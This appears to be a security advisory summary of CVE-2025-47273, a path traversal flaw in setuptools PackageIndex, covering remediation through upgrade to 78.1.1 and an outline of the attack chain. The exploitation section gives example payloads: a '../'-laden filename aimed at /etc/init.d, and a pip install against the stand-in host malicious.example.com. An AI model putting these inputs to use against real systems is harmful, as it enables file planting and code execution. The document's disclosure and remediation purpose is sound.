setuptools: path traversal in setuptools PackageIndex (CVE-2025-47273) #shorts

Summary

In today’s podcast we cover CVE-2025-47273, a path traversal vulnerability in setuptools, the Python package management library. Disclosed in May 2025 and fixed in version 78.1.1, this issue allows an attacker to write files to arbitrary locations on the filesystem with the permissions of the running process. Several SUSE distributions have released important security updates for python-setuptools, python310-setuptools, and python312-setuptools to address this flaw.

Product details

Setuptools is a widely used Python package that manages downloading, building, installing, upgrading, and uninstalling Python libraries and applications. It is the backbone of many Python development and deployment workflows. SUSE has issued security updates for the python-setuptools package across multiple versions (including python310-setuptools and python312-setuptools) to remediate the vulnerability in affected releases prior to 78.1.1.

Vulnerability type summary

This vulnerability is classified as CWE-22, an 'Improper Limitation of a Pathname to a Restricted Directory,' commonly known as a path traversal flaw. It occurs when user-controlled input influences file paths and the application fails to properly restrict or sanitize those paths, enabling access outside of the intended directory.

Details of the vulnerability

In setuptools versions before 78.1.1, the PackageIndex component improperly handles crafted paths, allowing an attacker to traverse directories and write files anywhere the Python process has permission. This could lead to arbitrary code execution, data corruption, or disruption of service depending on context. Because setuptools often runs with elevated privileges during package installation, successful exploitation can have serious consequences on affected systems.

Conclusion

To protect your environment, upgrade setuptools to version 78.1.1 or later—apply the SUSE security updates for python-setuptools, python310-setuptools, and python312-setuptools immediately. Regularly review and apply security advisories for your Python tooling, and follow best practices for package validation and isolation to minimize risk.

Watch the full video on YouTube: CVE-2025-47273

Remediation and exploitation details

This chain involves the following actors

  • Attacker: Crafts and hosts a malicious package index payload
  • Python user: Installs packages using setuptools

This following systems are involved

  • setuptools PackageIndex (Downloads and unpacks Python packages): Component vulnerable to path traversal
  • Local filesystem (Stores installed files and packages): Target for arbitrary file writes

Attack entry point

  • PackageIndex.download: Code path in setuptools that retrieves and writes package files to disk

Remediation actions

Python user
Upgrade setuptools to version 78.1.1 or later
Python environment
Security team
Restrict use of untrusted package indexes and enforce source validation
Development pipeline

Exploitation actions

Path traversal in file metadata

Attacker
Host a fake package index containing file entries with '../' sequences
setuptools PackageIndex
Examples:
  • Provide package metadata referencing filenames like '../../../../etc/init.d/malicious.sh'

Pointing the installer to an untrusted index

Python user
Run pip install against the malicious index
setuptools PackageIndex
Examples:
  • pip install --index-url http://malicious.example.com simplepkg

Writing files outside the intended directory

setuptools PackageIndex
Download and extract files without normalizing paths
Local filesystem
Examples:
  • Writing a script to '/etc/init.d/malicious.sh' or appending to '~/.bashrc'

Escalation to remote code execution

Attacker
Trigger execution of the planted payload
Operating system startup or Python runtime
Examples:
  • Rebooting the system to run '/etc/init.d/malicious.sh' at boot

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-47273
Description
setuptools is a package that allows users to download, build, install, upgrade, and uninstall Python packages. A path traversal vulnerability in `PackageIndex` is present in setuptools prior to version 78.1.1. An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to remote code execution depending on the context. Version 78.1.1 fixes the issue.
Provider
GitHub_M
CWE / problem types
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected Software Versions
pypa:setuptools:[{'version': '< 78.1.1', 'status': 'affected'}]
Date Published
2025-05-17T15:46:11.399Z
Last Updated
2025-05-28T15:03:15.516Z